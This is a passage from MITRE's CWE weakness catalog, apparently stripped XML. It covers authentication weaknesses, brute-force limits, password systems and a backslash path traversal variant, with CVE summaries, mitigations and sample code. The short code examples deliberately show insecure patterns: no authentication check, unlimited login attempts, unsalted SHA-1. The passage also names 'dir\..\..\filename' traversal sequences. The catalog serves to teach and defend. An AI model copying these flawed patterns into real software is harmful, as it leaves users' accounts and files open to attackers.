Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + + + + + CVE-2002-1374 + The provided password is only compared against the first character of the real password. + https://www.cve.org/CVERecord?id=CVE-2002-1374 + + + CVE-2000-0979 + The password is not properly checked, which allows remote attackers to bypass access controls by sending a 1-byte password that matches the first character of the real password. + https://www.cve.org/CVERecord?id=CVE-2000-0979 + + + CVE-2001-0088 + Chain: Forum software does not properly initialize an array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the password and gain administrative privileges. + https://www.cve.org/CVERecord?id=CVE-2001-0088 + + + + + Authentication Bypass by Primary Weakness + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Most "authentication bypass" errors are resultant, not primary. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. + + As data is migrated to the cloud, if access does not require authentication, it can be easier for attackers to access the data from anywhere on the Internet. + + + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + High + + + Access Control + Other + Gain Privileges or Assume Identity + Other + Exposing critical functionality essentially provides an attacker with the privilege level of that functionality. The consequences will depend on the associated functionality, but they can range from reading or modifying sensitive data, access to administrative or other privileged functionality, or possibly even execution of arbitrary code. + + + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is useful for evaluating the correctness of custom authentication mechanisms. + + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Automated Static Analysis + + Automated static analysis is useful for detecting commonly-used idioms for authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries. + Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives. + + Limited + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host Application Interface Scanner + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Architecture and Design + + Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability. + Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port. + In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Architecture and Design + + Where possible, avoid implementing custom authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These may make it easier to provide a clear separation between authentication tasks and authorization tasks. + In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45]. + + + + Implementation + System Configuration + Operation + When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to require strong authentication for users who should be allowed to access the data [REF-1297] [REF-1298] [REF-1302]. + + + + + In the following Java example the method createBankAccount is used to create a BankAccount object for a bank management application. + + public BankAccount createBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) { + + BankAccount account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance); + return account; + } + + However, there is no authentication mechanism to ensure that the user creating this bank account object has the authority to create new bank accounts. Some authentication mechanisms should be used to verify that the user has the authority to create bank account objects. + The following Java code includes a boolean variable and method for authenticating a user. If the user has not been authenticated then the createBankAccount will not create the bank account object. + + private boolean isUserAuthentic = false; + + // authenticate user, + + + // if user is authenticated then set variable to true + + + // otherwise set variable to false + public boolean authenticateUser(String username, String password) {...} + public BankAccount createNewBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) { + BankAccount account = null; + if (isUserAuthentic) {account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);}return account; + } + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors did not use any authentication for critical functionality in their OT products. + + + In 2021, a web site operated by PeopleGIS stored data of US municipalities in Amazon Web Service (AWS) Simple Storage Service (S3) buckets. + + A security researcher found 86 S3 buckets that could be accessed without authentication (CWE-306) and stored data unencrypted (CWE-312). These buckets exposed over 1000 GB of data and 1.6 million files including physical addresses, phone numbers, tax documents, pictures of driver's license IDs, etc. [REF-1296] [REF-1295] + + While it was not publicly disclosed how the data was protected after discovery, multiple options could have been considered. + + The sensitive information could have been protected by ensuring that the buckets did not have public read access, e.g., by enabling the s3-account-level-public-access-blocks-periodic rule to Block Public Access. In addition, the data could have been encrypted at rest using the appropriate S3 settings, e.g., by enabling server-side encryption using the s3-bucket-server-side-encryption-enabled setting. Other settings are available to further prevent bucket data from being leaked. [REF-1297] + + + + + + CVE-2022-29951 + TCP-based protocol in Programmable Logic Controller (PLC) has no authentication. + https://www.cve.org/CVERecord?id=CVE-2022-29951 + + + CVE-2022-29952 + Condition Monitor firmware uses a protocol that does not require authentication. + https://www.cve.org/CVERecord?id=CVE-2022-29952 + + + CVE-2022-30276 + SCADA-based protocol for bridging WAN and LAN traffic has no authentication. + https://www.cve.org/CVERecord?id=CVE-2022-30276 + + + CVE-2022-30313 + Safety Instrumented System uses proprietary TCP protocols with no authentication. + https://www.cve.org/CVERecord?id=CVE-2022-30313 + + + CVE-2022-30317 + Distributed Control System (DCS) uses a protocol that has no authentication. + https://www.cve.org/CVERecord?id=CVE-2022-30317 + + + CVE-2021-21972 + Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21972 + + + CVE-2021-37415 + IT management product does not perform authentication for some REST API requests, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-37415 + + + CVE-2020-13927 + Default setting in workflow management product allows all API requests without authentication, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-13927 + + + CVE-2002-1810 + MFV. Access TFTP server without authentication and obtain configuration file with sensitive plaintext information. + https://www.cve.org/CVERecord?id=CVE-2002-1810 + + + CVE-2008-6827 + Agent software running at privileges does not authenticate incoming requests over an unprotected channel, allowing a Shatter" attack. + https://www.cve.org/CVERecord?id=CVE-2008-6827 + + + CVE-2004-0213 + Product enforces restrictions through a GUI but not through privileged APIs. + https://www.cve.org/CVERecord?id=CVE-2004-0213 + + + CVE-2020-15483 + monitor device allows access to physical UART debug port without authentication + https://www.cve.org/CVERecord?id=CVE-2020-15483 + + + CVE-2019-9201 + Programmable Logic Controller (PLC) does not have an authentication feature on its communication protocols. + https://www.cve.org/CVERecord?id=CVE-2019-9201 + + + + + No Authentication for Critical Function + + + SFP31 + Missing authentication + + + Part 4-2 + Req CR 1.1 + + + Part 4-2 + Req CR 1.2 + + + Part 4-2 + Req CR 2.1 + + + Part 4-1 + Req SR-2 + + + Part 4-1 + Req SVV-3 + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + No Authentication for Critical Function + + + + The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks. + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + An attacker could perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account. + + + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Web Application Scanner + Web Services Scanner + Database Scanners + + Cost effective for partial coverage: + + Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Fuzz Tester + Framework-based Fuzzer + + Cost effective for partial coverage: + + Forced Path Execution + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + + Common protection mechanisms include: + + Disconnecting the user after a small number of failed attempts + Implementing a timeout + Locking out a targeted account + Requiring a computational task on the user's part. + + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45] + + + + + + In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts [REF-236]. The attacker targeted a member of Twitter's support team and was able to successfully guess the member's password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts. + + + + + + The following code, extracted from a servlet's doPost() method, performs an authentication lookup every time the servlet is invoked. + + String username = request.getParameter("username");String password = request.getParameter("password"); + int authResult = authenticateUser(username, password); + + However, the software makes no attempt to restrict excessive authentication attempts. + + + This code attempts to limit the number of login attempts by causing the process to sleep before completing the authentication. + + $username = $_POST['username'];$password = $_POST['password'];sleep(2000);$isAuthenticated = authenticateUser($username, $password); + + However, there is no limit on parallel connections, so this does not increase the amount of time an attacker needs to complete an attack. + + + In the following C/C++ example the validateUser method opens a socket connection, reads a username and password from the socket and attempts to authenticate the username and password. + + int validateUser(char *host, int port){ + int socket = openSocketConnection(host, port);if (socket < 0) {printf("Unable to open socket connection");return(FAIL);} + int isValidUser = 0;char username[USERNAME_SIZE];char password[PASSWORD_SIZE]; + while (isValidUser == 0) { + if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}} + }return(SUCCESS); + } + + The validateUser method will continuously check for a valid username and password without any restriction on the number of authentication attempts made. The method should limit the number of authentication attempts made to prevent brute force attacks as in the following example code. + + int validateUser(char *host, int port){ + ... + int count = 0;while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) { + if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}}count++; + }if (isValidUser) {return(SUCCESS);}else {return(FAIL);} + } + + + + Consider this example from a + real-world attack against the iPhone + [REF-1218]. An attacker can use brute force + methods; each time there is a failed guess, the + attacker quickly cuts the power before the failed + entry is recorded, effectively bypassing the + intended limit on the number of failed + authentication attempts. Note that this attack + requires removal of the cell phone battery and + connecting directly to the phone's power source, + and the brute force attack is still + time-consuming. + + + + + CVE-2019-0039 + the REST API for a network OS has a high limit for number of connections, allowing brute force password guessing + https://www.cve.org/CVERecord?id=CVE-2019-0039 + + + CVE-1999-1152 + Product does not disconnect or timeout after multiple failed logins. + https://www.cve.org/CVERecord?id=CVE-1999-1152 + + + CVE-2001-1291 + Product does not disconnect or timeout after multiple failed logins. + https://www.cve.org/CVERecord?id=CVE-2001-1291 + + + CVE-2001-0395 + Product does not disconnect or timeout after multiple failed logins. + https://www.cve.org/CVERecord?id=CVE-2001-0395 + + + CVE-2001-1339 + Product does not disconnect or timeout after multiple failed logins. + https://www.cve.org/CVERecord?id=CVE-2001-1339 + + + CVE-2002-0628 + Product does not disconnect or timeout after multiple failed logins. + https://www.cve.org/CVERecord?id=CVE-2002-0628 + + + CVE-1999-1324 + User accounts not disabled when they exceed a threshold; possibly a resultant problem. + https://www.cve.org/CVERecord?id=CVE-1999-1324 + + + + + AUTHENT.MULTFAIL + Multiple Failed Authentication Attempts not Prevented + + + SFP34 + Unrestricted authentication + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Description, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Multiple Failed Authentication Attempts not Prevented + Failure to Restrict Excessive Authentication Attempts + + + + The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme. + While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused, and common passwords is rampant on the internet. Without the added protection of multiple authentication schemes, a single mistake can result in the compromise of an account. For this reason, if multiple schemes are possible and also easy to use, they should be implemented and required. + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + High + + + Access Control + Bypass Protection Mechanism + If the secret in a single-factor authentication scheme gets compromised, full authentication is possible. + + + + + Architecture and Design + Use multiple independent authentication schemes, which ensures that -- if one of the methods is compromised -- the system itself is still likely safe from compromise. + + + + + In both of these examples, a user is logged in if their given password matches a stored password: + + unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); + //Login if hash matches stored hash + if (equal(ctext, secret_password())) {login_user();}} + + + String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); + //Login if hash matches stored hash + if (equal(digest,secret_password())) {login_user();} + + This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). + + + + + Using single-factor authentication + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Using Single-factor Authentication + + + + The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism. + + + + + + + + + + Password systems are the simplest and most ubiquitous authentication mechanisms. However, they are subject to such well known attacks,and such frequent compromise that their use in the most simple implementation is not practical. + + + + Architecture and Design + + + High + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + A password authentication mechanism error will almost always result in attackers being authorized as valid users. + + + + + Architecture and Design + + In order to protect password systems from compromise, the following should be noted: + + Passwords should be stored safely to prevent insider attack and to ensure that -- if a system is compromised -- the passwords are not retrievable. Due to password reuse, this information may be useful in the compromise of other systems these users work with. In order to protect these passwords, they should be stored encrypted, in a non-reversible state, such that the original text password cannot be extracted from the stored value. + Password aging should be strictly enforced to ensure that passwords do not remain unchanged for long periods of time. The longer a password remains in use, the higher the probability that it has been compromised. For this reason, passwords should require refreshing periodically, and users should be informed of the risk of passwords which remain in use for too long. + Password strength should be enforced intelligently. Rather than restrict passwords to specific content, or specific length, users should be encouraged to use upper and lower case letters, numbers, and symbols in their passwords. The system should also ensure that no passwords are derived from dictionary words. + + + + + Architecture and Design + Use a zero-knowledge password protocol, such as SRP. + + + Architecture and Design + Ensure that passwords are stored safely and are not reversible. + + + Architecture and Design + Implement password aging functionality that requires passwords be changed after a certain point. + + + Architecture and Design + Use a mechanism for determining the strength of a password and notify the user of weak password use. + + + Architecture and Design + Inform the user of why password protections are in place, how they work to protect data integrity, and why it is important to heed their warnings. + + + + + In both of these examples, a user is logged in if their given password matches a stored password: + + unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); + //Login if hash matches stored hash + if (equal(ctext, secret_password())) {login_user();}} + + + String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); + //Login if hash matches stored hash + if (equal(digest,secret_password())) {login_user();} + + This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). + + + + + Using password systems + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Using Password Systems + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize 'dir\..\..\filename' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The 'dir\..\..\filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one "..\" sequence, so multiple "..\" can bypass that check. Alternately, this manipulation could be used to bypass a check for "..\" at the beginning of the pathname, moving up more than one directory level. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0160 + The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a "..\.." sequence in the URL to port 2002. + https://www.cve.org/CVERecord?id=CVE-2002-0160 + + + + + 8 - 'directory\..\..\filename + + + SFP16 + Path Traversal + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a 